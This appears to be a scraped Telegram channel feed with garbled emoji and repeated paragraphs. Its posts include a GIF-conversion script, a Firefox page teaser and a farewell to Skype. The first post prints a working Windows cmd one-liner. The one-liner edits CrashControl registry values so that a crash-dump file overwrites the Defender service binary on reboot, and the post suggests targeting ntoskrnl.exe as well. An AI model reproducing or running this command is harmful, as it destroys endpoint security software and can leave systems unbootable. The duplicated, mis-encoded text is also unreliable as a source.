π₯ Is your Defender a dump? Yes it is!
Security researcher sixtyvividtails uncovered a trick to destroy any EDR upon boot by overwriting it with a crash dump.
π» No system crash needed, only reboot.
π» Defender is just an example; works versus anything (try ntoskrnl.exe).
π» Dedicated dump is not the only bootside kill; at least 4 more distinct yet similar ways.
The code:
Security researcher sixtyvividtails uncovered a trick to destroy any EDR upon boot by overwriting it with a crash dump.
π» No system crash needed, only reboot.
π» Defender is just an example; works versus anything (try ntoskrnl.exe).
π» Dedicated dump is not the only bootside kill; at least 4 more distinct yet similar ways.
The code:
cmd /v/c "set R=reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /f /v&!R! CrashDumpEnabled /d 7 /t 4&!R! DumpFileSize /d 666 /t 4&for /f "delims=*" %i in ('sc qc WinDefend^|find "PATH_"')do (set t=%i&!R! DedicatedDumpFile /d !t:~29,-1!)"π±57β€8π4π4
π ezgif.cmd
Since Telegram has a wide variety of GIFs I want to share with my friends on Discord and they're stored as videos, I decided to automate the process of using ezgif. FFMPEG and Gifsicle are required, they also need to be in PATH.
The source code:
A special treat for Linux fams:
Since Telegram has a wide variety of GIFs I want to share with my friends on Discord and they're stored as videos, I decided to automate the process of using ezgif. FFMPEG and Gifsicle are required, they also need to be in PATH.
The source code:
ffmpeg -i %1 -vf "fps=15,scale=512:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse" output.gif && gifsicle -O3 --lossy=80 output.gif -o output.gif
A special treat for Linux fams:
#!/bin/sh
input="$1"
ffmpeg -i "$input" -vf "fps=15,scale=512:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse" output.gif && gifsicle -O3 --lossy=80 output.gif -o output.gif
β€57π7π6π±1π’1
Enderman
π ezgif.cmd Since Telegram has a wide variety of GIFs I want to share with my friends on Discord and they're stored as videos, I decided to automate the process of using ezgif. FFMPEG and Gifsicle are required, they also need to be in PATH. The source code:β¦
π We value your privacy
Another reason for you to learn FFMPEG and GIF optimization tools.
Another reason for you to learn FFMPEG and GIF optimization tools.
π54π±19β€7π€1
What happened here?
bedrock/firefox/templates/firefox/includes/structured-data-firefox-faq.htmlPlease open Telegram to view this post
VIEW IN TELEGRAM
π€88π€¬16β€7π’7π±3π1π1π1
Insider version of Skype for Android has a newly added text string that states Β«Starting in May 2025, Skype will no longer be availableΒ».
Back in 2017-2018 Discord pretty much superseded Skype. I was actively using Skype until my friends started swiftly moving to Discord, which in turn pushed me to switch. We used to chat there all the time with happywin98, Daniel Myslivets and others from our former friend group. Out of ~10 people only two of us remained to this day.
This is a tale from about 10 years ago (2016), and it's baffling to realize some of my fans weren't even born back then.
We used to have so much fun on that platform. We're getting older, and the Β«back in my dayΒ» moments are actually starting to occur.
Skype was our lobby before Discord. Rest in peace.
Please open Telegram to view this post
VIEW IN TELEGRAM
π’114β€12π7π±1π1